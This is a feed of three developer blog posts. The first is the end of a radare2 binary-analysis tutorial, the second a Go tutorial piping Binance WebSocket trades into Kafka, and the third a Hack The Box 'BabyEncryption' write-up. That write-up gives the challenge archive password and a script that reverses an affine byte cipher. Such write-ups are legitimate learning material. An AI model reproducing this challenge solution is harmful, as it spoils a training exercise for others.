&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--TU895_1J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AH5CZ_LuCF1c8yP86" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--TU895_1J--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AH5CZ_LuCF1c8yP86" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Views and Disassembly
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Press V to access various views of the binary file.&lt;/li&gt;
&lt;li&gt;Type p to switch between different views like hex, disassembly, debugger, ASCII hex, diffuse, and color visual.&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Hex View Example
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--GwVe9oZb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE68ZMf68sFTlZ_YL" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--GwVe9oZb--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE68ZMf68sFTlZ_YL" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Press Enter to select the first line in the disassembler (similar to double-clicking a line).&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Steps for Analysis
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;From the disassembly view, open the radare2 command prompt by typing Shift+:.&lt;/li&gt;
&lt;li&gt;Commands entered at this prompt run against the binary without leaving the visual view.&lt;/li&gt;
&lt;li&gt;Analyze the binary by typing aaa and pressing Enter.&lt;/li&gt;
&lt;li&gt;Display the functions in the binary with afl.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--YjhSQJ4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE4zu4P2QBCf_6tdl" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--YjhSQJ4p--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AE4zu4P2QBCf_6tdl" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol start="5"&gt;
&lt;li&gt;To focus on the main code, type s main and press Enter twice.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--8ezbR9Ql--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AyM6A6jpfvTIRrmwm" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--8ezbR9Ql--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AyM6A6jpfvTIRrmwm" alt="" width="" height=""&gt;&lt;/a&gt;&lt;/p&gt;

&lt;ol start="6"&gt;
&lt;li&gt;&lt;p&gt;Explore the main code of the disassembly.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;When entering a printf or similar function during reverse engineering, press Enter to view the stub code.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--T6FcSZD3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A6yFAezKPlVpN-k0M" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--T6FcSZD3--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2A6yFAezKPlVpN-k0M" alt="" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Note
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;To navigate back to the previous location, press &lt;code&gt;u&lt;/code&gt; (undo seek).&lt;/li&gt;
&lt;/ul&gt;

&lt;h4&gt;
  
  
  Conclusion
&lt;/h4&gt;

&lt;blockquote&gt;
&lt;p&gt;By using Radare2 for static navigation and disassembly, you’ve gained a foundational understanding of binary analysis. This tool provides a robust set of commands for inspecting, analyzing, and navigating through binaries. As you continue your journey with Radare2, you’ll unlock its full potential in reverse engineering and binary analysis.&lt;/p&gt;

&lt;p&gt;Experiment with different commands, explore various views, and deepen your comprehension of binary structures. The insights gained from static analysis will prove invaluable as you progress in your understanding of Radare2.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Stay tuned for the next part, where we’ll dive into advanced features and real-world examples. In Part 2, we’ll explore dynamic analysis, debugging, and more cool aspects of Radare2. Get ready for the next chapter in your Radare2 learning adventure!&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/radare2/tree/main"&gt;GitHub - Kamalesh-Seervi/radare2&lt;/a&gt;&lt;/p&gt;

</description>
      <category>ctf</category>
      <category>cybersecurity</category>
      <category>reverseengineering</category>
      <category>hacking</category>
    </item>
    <item>
      <title>Real-Time Trading App: Golang, Kafka, Websockets — Setting up Kafka in Golang (PART-2)</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Tue, 19 Dec 2023 15:36:39 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-2bjo</link>
      <guid>https://dev.to/kamaleshseervi/real-time-trading-app-golang-kafka-websockets-setting-up-kafka-in-golang-part-2-2bjo</guid>
      <description>&lt;h3&gt;
  
  
  &lt;strong&gt;Real-Time Trading App: Golang, Kafka, Websockets — Setting up Kafka in Golang (PART-2)&lt;/strong&gt;
&lt;/h3&gt;

&lt;p&gt;Configuring Kafka in a Golang environment and creating a build file for the producer.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--DAU43kBM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AoIqi57mf6vBHV1gA" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--DAU43kBM--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/0%2AoIqi57mf6vBHV1gA" alt="golang kafka" width="800" height="423"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;This marks &lt;strong&gt;Part 2&lt;/strong&gt; of our real-time trade app series in Golang. In this installment, we’ll dive into coding for Kafka, focusing on establishing a connection and creating a producer build file. This step is crucial for testing the API connection to Binance’s web sockets. Stay tuned for hands-on coding and insights into optimizing the integration!&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Establishing a connection with the data source
&lt;/h4&gt;

&lt;p&gt;As previously noted, we’ll utilize Binance’s WebSocket API as our data source. Within your app folder, create a &lt;strong&gt;trades&lt;/strong&gt; subfolder and include the following files: &lt;strong&gt;listener.go, publish.go, and ticker.go&lt;/strong&gt;.&lt;/p&gt;
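&lt;p&gt;If you prefer the terminal, the same layout can be created with a couple of commands (folder and file names exactly as above):&lt;/p&gt;

```shell
# create the trades subfolder and its three (for now empty) source files
mkdir -p trades
touch trades/listener.go trades/publish.go trades/ticker.go
```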

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--r2MeHIMu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZimK6YdCx6wCFFnP866bSg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--r2MeHIMu--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AZimK6YdCx6wCFFnP866bSg.png" alt="kafka golang" width="800" height="350"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Ticker.go
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Within ticker.go, you’ll find the model for the ticker data sourced from Binance. This model serves a dual purpose, as it will be employed for both receiving and publishing the data.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

type Ticker struct {
 Symbol string `json:"s"`
 Price string `json:"p"`
 Quantity string `json:"q"` 
 Time int64 `json:"T"`
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Listener.go
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;As the name implies, listener.go houses the code where we actively listen for specific tickers through a WebSocket connection. Let’s delve into the details, starting with the establishment of the WebSocket connection.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

import (
 "encoding/json"
 "log"
 "net/url"

 "github.com/gorilla/websocket"
)

type RequestParams struct {
 Id int `json:"id"`
 Method string `json:"method"`
 Params []string `json:"params"`
}

var conn *websocket.Conn

const (
 subscribeId = 1
 unSubscribeId = 2
)

func getConnection() (*websocket.Conn, error) {
 if conn != nil {
  return conn, nil
 }

 u := url.URL{Scheme: "wss", Host: "stream.binance.com:443", Path: "/ws"}
 log.Printf("connecting to %s", u.String())
 c, resp, err := websocket.DefaultDialer.Dial(u.String(), nil)
 if err != nil {
  if resp != nil { // resp may be nil if the handshake never completed
   log.Printf("handshake failed with status %d", resp.StatusCode)
  }
  log.Println("dial:", err)
  return nil, err
 }
 conn = c

 return conn, nil
}

func CloseConnections() {
 if conn != nil {
  conn.Close()
 }
}

func EstablishConnection() (*websocket.Conn, error) {
 newConnection, err := getConnection()
 if err != nil {
  log.Printf("Failed to get connection: %s", err.Error())
  return nil, err
 }
 return newConnection, nil
}

func AddOnConnectionClose(h func(code int, text string) error) {
 conn.SetCloseHandler(h)
}

func unsubscirbeOnClose(conn *websocket.Conn, tradeTopics []string) error {
 message := RequestParams{
  Id: unSubscribeId,
  Method: "UNSUBSCRIBE",
  Params: tradeTopics,
 }

 b, err := json.Marshal(message)
 if err != nil {
  log.Println("Failed to JSON encode trade topics")
  return err
 }

 return conn.WriteMessage(websocket.TextMessage, b)
}

func SubScribeAndListen(topics []string) error {
 conn, err := getConnection()
 if err != nil {
  log.Printf("Failed to get connection: %s", err.Error())
  return err
 }

 conn.SetPongHandler(func(appData string) error {
  log.Println("Received pong:", appData)
  pingFrame := []byte{1, 2, 3, 4, 5}
  err := conn.WriteMessage(websocket.PingMessage, pingFrame)
  if err != nil {
   log.Println(err)
   // no need to fail
  }
  return nil
 })

 tradeTopics := make([]string, 0, len(topics))
 for _, topic := range topics {
  tradeTopics = append(tradeTopics, topic+"@aggTrade")
 }
 log.Println("Listening to trades for ", tradeTopics)
 message := RequestParams{
  Id: subscribeId,
  Method: "SUBSCRIBE",
  Params: tradeTopics,
 }
 log.Println(message)
 b, err := json.Marshal(message)
 if err != nil {
  log.Println("Failed to JSON encode trade topics")
  return err
 }

 err = conn.WriteMessage(websocket.TextMessage, b)
 if err != nil {
  log.Println("Failed to subscribe to topics: " + err.Error())
  return err
 }

 defer unsubscirbeOnClose(conn, tradeTopics)
 defer conn.Close()

 for {
  _, payload, err := conn.ReadMessage()
  if err != nil {
   log.Println(err)
   return err
  }

  trade := Ticker{}

  err = json.Unmarshal(payload, &amp;amp;trade)
  if err != nil {
   log.Println(err)
   return err
  }

  log.Println(trade.Symbol, trade.Price, trade.Quantity)
 }
}

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This code defines the listener functionality for the real-time trading app, focusing on establishing a WebSocket connection and handling incoming ticker data from Binance. Let’s break it down:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Imports:&lt;/strong&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;Necessary packages are imported, including &lt;strong&gt;“github.com/gorilla/websocket”&lt;/strong&gt; for WebSocket communication; &lt;strong&gt;“github.com/segmentio/kafka-go”&lt;/strong&gt; will be added later for Kafka integration.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Data Structures:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;RequestParams:&lt;/strong&gt; Struct to represent the parameters for the WebSocket request.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;conn:&lt;/strong&gt; Variable to store the WebSocket connection.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Constants:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;subscribeId&lt;/strong&gt; and &lt;strong&gt;unSubscribeId&lt;/strong&gt; : Constants representing subscription and unsubscription identifiers.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;4. Functions:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;getConnection()&lt;/strong&gt;: Establishes a WebSocket connection to Binance’s streaming service.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CloseConnections()&lt;/strong&gt;: Closes the WebSocket connection.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;EstablishConnection()&lt;/strong&gt;: Ensures a connection is established; if not, initiates a new one.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;AddOnConnectionClose(h func(code int, text string) error)&lt;/strong&gt;: Adds a handler for WebSocket connection closure.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;unsubscirbeOnClose(conn *websocket.Conn, tradeTopics []string) error&lt;/strong&gt;: Unsubscribes from the specified trade topics upon connection closure.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;SubScribeAndListen(topics []string) error&lt;/strong&gt;: Subscribes to specified trade topics and listens for incoming data, then converts and publishes it to Kafka.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;5. WebSocket Operations:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
 — Connection handling, ping-pong setup, subscription to trade topics, and handling incoming messages are managed.  &lt;/p&gt;

&lt;p&gt;&lt;strong&gt;6. Data Processing:&lt;/strong&gt;&lt;br&gt;&lt;br&gt;
 — Upon receiving trade data, it’s deserialized into a &lt;code&gt;Ticker&lt;/code&gt; struct. The data is then logged, and a goroutine is spawned to convert and publish the data to Kafka.&lt;/p&gt;

&lt;p&gt;This comprehensive listener code sets the foundation for actively retrieving and processing real-time trading data from Binance through WebSockets, preparing it for further integration and analysis in the application.&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Testing&lt;/strong&gt;
&lt;/h4&gt;

&lt;ul&gt;
&lt;li&gt;Execute this code by invoking the &lt;code&gt;SubScribeAndListen&lt;/code&gt; function in your &lt;code&gt;main.go&lt;/code&gt; file.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package main

import (
 "fmt"
 "os"
 "strings"
 "github.com/joho/godotenv"
  "github.com/kamalesh-seervi/trade-app/producer/trades" // add this import (your editor may add it automatically)
)

func main() {
 err := godotenv.Load("../.env")
 if err != nil {
  fmt.Println("Failed to load environment")
 }
 t := os.Getenv("TICKERS")
 topics := strings.Split(t, ",")
 for i,topic := range topics {
  topics[i] = strings.Trim(strings.Trim(topic,"\\"),"\"") 
 }

 trades.SubScribeAndListen( // subscribe and start listening on the WebSocket
  topics,
 )

}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;Build and run the app.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go build . &amp;amp;&amp;amp; ./trade-app // change it accordingly
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--X6hjFaqY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ACDGiw5GNg_fUXsms3u0qmQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--X6hjFaqY--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2ACDGiw5GNg_fUXsms3u0qmQ.png" alt="" width="800" height="267"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Realtime Data from the Binance API&lt;/em&gt;&lt;/p&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Publish.go&lt;/strong&gt;
&lt;/h4&gt;


&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;package trades

import (
 "context"
 "log"
 "github.com/segmentio/kafka-go"
)

var (
 HOST string
 PORT string
)

func LoadHostAndPort(host string, port string){
 HOST = host
 PORT = port
} 

func Publish(t string, message kafka.Message, topic string) error {

 messages := []kafka.Message{
  message,
 }

 // a Writer per message keeps the example simple; reuse one Writer in production
 w := kafka.Writer{
  Addr: kafka.TCP(HOST + ":" + PORT), // 127.0.0.1:9092, or kafka:9092 inside docker
  Topic: topic,
  AllowAutoTopicCreation: true,
 }
 defer w.Close()

 err := w.WriteMessages(context.Background(), messages...)
 if err != nil {
  log.Println("Error writing msg to Kafka: ", err.Error())
  return err
 }

 log.Println("Published msg to Kafka on topic: ", topic)

 return nil
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;Integrate this function into the listener.go file to facilitate Kafka publishing.
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;func SubScribeAndListen(topics []string) error {

  ...
  ...
  ...

 for {
  _, payload, err := conn.ReadMessage()
  if err != nil {
   log.Println(err)
   return err
  }

  trade := Ticker{}

  err = json.Unmarshal(payload, &amp;amp;trade)
  if err != nil {
   log.Println(err)
   return err
  }

  log.Println(trade.Symbol, trade.Price, trade.Quantity)
  go func() { // &amp;lt;=== here
   convertAndPublishToKafka(trade)
  }() 
 }
}

// add this function (it also needs "strconv" and "strings" in the import block)
func convertAndPublishToKafka(t Ticker) {
 bytes, err := json.Marshal(t)
 if err != nil {
  log.Println("Error marshalling Ticker data", err.Error())
  return
 }

 Publish(t.Symbol, kafka.Message{
  Key: []byte(t.Symbol + "-" + strconv.Itoa(int(t.Time))),
  Value: bytes,
 }, "trades-"+strings.ToLower(t.Symbol))
}
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;In the existing code snippet, a goroutine is initiated using the “go” keyword to concurrently execute the convertAndPublishToKafka function. Here’s a breakdown:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Logging Trade Data:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;log.Println(trade.Symbol, trade.Price, trade.Quantity)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;This line logs essential details of the incoming trade data, providing visibility into the traded symbol, price, and quantity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;2. Goroutine for Kafka Publishing:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;go func() { convertAndPublishToKafka(trade) }(
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;By using a goroutine, this section ensures non-blocking execution of the convertAndPublishToKafka function. This approach enhances the overall efficiency of the application, allowing it to continue processing incoming trade data without waiting for the Kafka publishing process to complete.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. convertAndPublishToKafka Function:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;func convertAndPublishToKafka(t Ticker) { // ... (existing code) }
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;This function takes the received trade data (Ticker object), marshals it into JSON format, and then publishes it to Kafka. Key details, such as the trading symbol and timestamp, are utilized for Kafka message formatting. Any errors during the marshaling process are appropriately logged.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--Rlf5mVTF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AIwy2-jUf5b3sY5j41CoWag.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--Rlf5mVTF--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AIwy2-jUf5b3sY5j41CoWag.png" alt="" width="800" height="220"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;We’ve wrapped up the implementation of our producer service. If you have any questions, feel free to leave a comment below. I’ll be sharing the complete code shortly as we progress through the series, so stay tuned for that.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;What’s coming up next?&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Our next focus will be on the consumer service. In this part, we’ll be exposing a WebSocket API for the frontend. Data will be pushed to the frontend through a Kafka listener. Stay tuned for the upcoming content!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/Kamalesh-Seervi/Real-time-trade-app"&gt;GitHub - Kamalesh-Seervi/Real-time-trade-app: Kafka, WebSockets&lt;/a&gt;&lt;/p&gt;

</description>
      <category>finops</category>
      <category>go</category>
      <category>docker</category>
      <category>kafka</category>
    </item>
    <item>
      <title>BabyEncryption Hack The Box</title>
      <dc:creator>Kamalesh-Seervi</dc:creator>
      <pubDate>Fri, 15 Dec 2023 14:33:13 +0000</pubDate>
      <link>https://dev.to/kamaleshseervi/babyencryption-hack-the-box-gm0</link>
      <guid>https://dev.to/kamaleshseervi/babyencryption-hack-the-box-gm0</guid>
      <description>&lt;h4&gt;
  
  
  &lt;strong&gt;HTB | Crypto Challenge&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--ZxCPdCb7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ajh_88Pqk7cOMTt0aHP0taQ.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--ZxCPdCb7--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2Ajh_88Pqk7cOMTt0aHP0taQ.png" alt="hackthebox" width="800" height="405"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;You are tasked with discovering the flag by deciphering the provided ciphertext. The challenge includes a Python script for decryption, but you need to modify the script before executing it. As a newcomer to Hack The Box (HTB), I’m not sure whether this approach is standard or specific to this challenge. Let’s proceed without delay.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  Unzipping the file
&lt;/h4&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--1eyE_vRv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxArgzof4gPJ1UGnRlCQw3g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--1eyE_vRv--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxArgzof4gPJ1UGnRlCQw3g.png" alt="" width="800" height="440"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;&lt;em&gt;Password&lt;/em&gt;&lt;/strong&gt;: &lt;em&gt;hackthebox&lt;/em&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;ul&gt;
&lt;li&gt;Upon extracting the archive, two additional files emerge: &lt;strong&gt;chall.py&lt;/strong&gt; housing the Python script for deciphering the ciphertext, and &lt;strong&gt;msg.enc&lt;/strong&gt; which stores the encrypted text. Now, let’s examine the contents of these files.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--d269V-R6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxCkmDRTayRcFD_2zKVUl7g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--d269V-R6--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AxCkmDRTayRcFD_2zKVUl7g.png" alt="" width="800" height="483"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;chall.py &amp;amp; msg.enc&lt;/em&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Executing the script will result in the following error messages.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--dR2WSf5a--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A73MNGVxNAKnTjqfpFNBesA.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--dR2WSf5a--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2A73MNGVxNAKnTjqfpFNBesA.png" alt="" width="800" height="105"&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;error script&lt;/em&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;After spending a few moments attempting to resolve the errors, I opted to abandon that approach and chose to modify the script instead.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://res.cloudinary.com/practicaldev/image/fetch/s--QXF8An0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AoZSBCwWisbvQtS0eaGX8Rg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--QXF8An0_--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_800/https://cdn-images-1.medium.com/max/1024/1%2AoZSBCwWisbvQtS0eaGX8Rg.png" alt="" width="" height=""&gt;&lt;/a&gt;&lt;br&gt;
&lt;em&gt;Decode Script&lt;/em&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;def decrypt(msg):
    pt = []
    for char in msg:
        char= char-18
        char=179*char%256
        pt.append(char)
    return bytes(pt)

with open("msg.enc") as f:
    ct=bytes.fromhex(f.read())
print(decrypt(ct))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The value 179 is used in the decryption script as part of the reverse operation to undo the multiplication and modulo operation performed during encryption. In the encryption script, there’s a line:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;ct.append((123 * char + 18) % 256)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This means during encryption, each character (char) is multiplied by 123, then 18 is added, and finally, the result is taken modulo 256.&lt;/p&gt;

&lt;p&gt;In the decryption script, the goal is to reverse this process. The line:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;char = 179 * char % 256
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;performs the reverse calculation. It uses 179 as the modular multiplicative inverse of 123 modulo 256. In modular arithmetic, the modular multiplicative inverse of a number &lt;code&gt;a&lt;/code&gt; modulo &lt;code&gt;m&lt;/code&gt; is a number &lt;code&gt;b&lt;/code&gt; such that &lt;code&gt;(a * b) % m == 1&lt;/code&gt;. In this case, 179 is chosen because &lt;code&gt;(123 * 179) % 256 == 1&lt;/code&gt;, allowing the decryption process to reverse the effect of the original multiplication and modulo operation.&lt;/p&gt;
